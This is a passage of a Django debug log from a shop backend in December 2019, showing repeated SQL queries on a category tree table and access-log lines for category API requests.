(0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:49:40,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:49:40,910 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:49:40,914 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:49:40,917 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:49:40,920 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:49:40,924 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:49:40,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:49:40,931 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:49:40,935 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:49:40,939 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:49:40,943 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:49:40] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 05:49:41,041 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 05:49:41,051 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 05:49:41] "GET /api/v1/categories/10 HTTP/1.0" 200 353 [20/Dec/2019 05:51:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 05:52:50,496 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:52:50,502 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:52:50,506 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:52:50,508 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:52:50,512 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:52:50,514 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:52:50,517 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:52:50,520 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:52:50,523 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:52:50,526 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:52:50,529 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:52:50,531 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:52:50,533 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:52:50,536 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:52:50,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:52:50,542 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:52:50,544 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:52:50,547 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:52:50,549 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:52:50,553 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:52:50,555 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:52:50,558 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:52:50,560 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:52:50,563 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:52:50,565 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:52:50,569 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:52:50,571 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:52:50,573 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:52:50,576 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:52:50,578 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:52:50,581 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:52:50,584 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:52:50,586 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:52:50,589 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:52:50,591 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:52:50,595 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:52:50,597 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:52:50,600 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:52:50,602 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:52:50,604 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:52:50,606 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:52:50,609 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:52:50,612 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:52:50,614 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:52:50,617 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:52:50,619 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:52:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 05:55:13,717 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:55:13,724 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:55:13,728 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:55:13,730 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:55:13,733 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:55:13,735 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:55:13,739 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:55:13,741 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 